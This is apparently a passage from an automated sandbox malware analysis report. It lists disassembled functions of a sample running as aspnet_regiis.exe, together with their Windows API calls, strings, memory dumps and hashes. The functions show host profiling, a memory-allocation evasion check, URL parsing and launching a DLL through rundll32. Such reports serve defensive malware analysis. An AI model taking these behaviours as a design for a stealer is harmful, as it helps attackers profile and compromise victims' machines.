                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 181426013-0
                                                                                                                            • Opcode ID: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                            • Instruction ID: 49cd324ebe81867dc14fdb11462f5a122b1e841d4163eb6196de4943798d3ef6
                                                                                                                            • Opcode Fuzzy Hash: 2a8a8d3a5fb5e4c548b2e74474f278fcd92b95a51f6f99006cb2dd729b002af8
                                                                                                                            • Instruction Fuzzy Hash: 71115170A0424ADFCB019FA4CC999EEBBB5AF48300F54417EF215E72A0CB355945CB59
                                                                                                                            Function 004010F0 Relevance: 9.1, APIs: 6, Instructions: 54memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 004010AA
                                                                                                                            • _memset.LIBCMT ref: 004010D0
                                                                                                                            • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 004010E6
                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,004184CC), ref: 00401100
                                                                                                                            • VirtualAllocExNuma.KERNEL32(00000000), ref: 00401107
                                                                                                                            • ExitProcess.KERNEL32 ref: 00401112
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1859398019-0
                                                                                                                            • Opcode ID: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                            • Instruction ID: 2816971d78f640c5210f5c3df2c68b6a36055d88f9abb901e61d14fe4f69d22d
                                                                                                                            • Opcode Fuzzy Hash: 0501fa894185b91e7b693979df3d5285810351213a83039d854fa14beaa21ce0
                                                                                                                            • Instruction Fuzzy Hash: 30F0C87238122077F22412763C6EF6B1A6C9B41F56F205035F308FB2D0D6699804967C
                                                                                                                            Function 00412962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                              • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                            • ShellExecuteEx.SHELL32(?), ref: 00412B84
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                            • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                            • API String ID: 2215929589-2108736111
                                                                                                                            • Opcode ID: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                            • Instruction ID: fcd8ae3be328f2bece2d36ab058f070ab7b5b8f350f6457e4fbb623da5ab610c
                                                                                                                            • Opcode Fuzzy Hash: c76b9356db023fdea971dc893b2b920fd300fe1c02b79897c04016921bfa74e0
                                                                                                                            • Instruction Fuzzy Hash: 4871EE71E40119ABCF10FFA6DD466CDB7B5AF04308F51406BF510B7191DBB8AE8A8B98
                                                                                                                            Function 00411684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004116CE
                                                                                                                              • Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
                                                                                                                              • Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB
                                                                                                                            • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
                                                                                                                            • lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713
                                                                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                            • String ID: Unknown
                                                                                                                            • API String ID: 2781187439-1654365787
                                                                                                                            • Opcode ID: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                            • Instruction ID: 5196d0f985b73c0c8bd0bad26c43f83b5151f3b6dc85e60399ef39d4da867d2e
                                                                                                                            • Opcode Fuzzy Hash: ab585756b44732b0c52de9de7319f605c52bcc59fa939e737159a870399f43be
                                                                                                                            • Instruction Fuzzy Hash: 6F118671A0011CABCB21EB65DD86FDD73B8AB18704F4004A6B645F7191DAB8AFC88F58
                                                                                                                            Function 00411119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00411138
                                                                                                                            • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
                                                                                                                            • wsprintfA.USER32 ref: 0041117A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                            • String ID: %d MB
                                                                                                                            • API String ID: 3644086013-2651807785
                                                                                                                            • Opcode ID: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                            • Instruction ID: b0b061f5290e25b68b6f7a4002290a0ac05d972f49bd8262d04e688218eddb93
                                                                                                                            • Opcode Fuzzy Hash: 8862206487a5735529afe943f838936f5b8579a15e145366872ddc586f9bf33b
                                                                                                                            • Instruction Fuzzy Hash: 7801A9B1E00218ABEB08DFB4DC45EEEB7B9EF08705F44006AF602D7290EA75D9818759
                                                                                                                            Function 0041BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,767474F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C), ref: 0041BC6E
                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,767474F0,?,0041CBEE,?,0041CC7C,00000000,06400000,00000003,00000000), ref: 0041BCA6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CreatePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2024441833-0
                                                                                                                            • Opcode ID: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                            • Instruction ID: ff1efad9a67633d22899531c3285d4c1b5d125596630838d4b1aaea72c6dc67b
                                                                                                                            • Opcode Fuzzy Hash: c2a5f8e1d00489231e5594f9a747e25d59c8a13e659a0516d0e6ae57d101117a
                                                                                                                            • Instruction Fuzzy Hash: CA31A2F0504B049FDB348F24A9D4BA37AE8EB15314F108E2FF19682691D33898C49B99
                                                                                                                            Function 6CC3C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC3C947
                                                                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CC3C969
                                                                                                                            • GetSystemInfo.KERNEL32(?), ref: 6CC3C9A9
                                                                                                                            • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CC3C9C8
                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CC3C9E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4191843772-0
                                                                                                                            • Opcode ID: 14e04f98abc6f68a221a4994a7de42ed2ff72c2370cad70b0103a08241492e55
                                                                                                                            • Instruction ID: 175d23052d95f614c2c2c418b3a936838a6a88b77aec02222b74de90273699f4
                                                                                                                            • Opcode Fuzzy Hash: 14e04f98abc6f68a221a4994a7de42ed2ff72c2370cad70b0103a08241492e55
                                                                                                                            • Instruction Fuzzy Hash: 45210731B013286BDB05AEA5FC9CBAE73B9BB4A300F51021AF907A7A40FB305C008790
                                                                                                                            Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                            • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                            • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CrackInternetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1274457161-0
                                                                                                                            • Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                            • Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
                                                                                                                            • Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
                                                                                                                            • Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94
                                                                                                                            Function 00410F51 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
                                                                                                                            • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
                                                                                                                            • RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3466090806-0
                                                                                                                            • Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                                            • Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
                                                                                                                            • Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
                                                                                                                            • Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60
                                                                                                                            Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                              • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                              • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                              • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                              • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                              • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                              • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                              • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                            • SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
                                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B
                                                                                                                            Strings
                                                                                                                            • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
